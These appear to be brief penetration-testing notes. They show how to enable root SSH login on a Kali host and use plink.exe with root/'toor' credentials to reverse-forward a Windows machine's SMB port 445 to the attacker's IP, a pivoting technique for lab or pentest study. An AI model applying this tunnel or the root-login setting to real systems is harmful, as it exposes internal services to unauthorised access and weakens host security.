Port forward (windows)
plink.exe
on linux
apt install ssh
cp /etc/ssh/ssh_config /etc/ssh/ssh_config-COPY
mousepad /etc/ssh/ssh_config
|-> #PermitRootLogin prohibit-password -> PermitRootLogin yes
service ssh restart
service ssh status
on windows plink.exe -l root -pw toor -R 445:127.0.0.1:445 <KALI_IP>
# Hit ENTER few times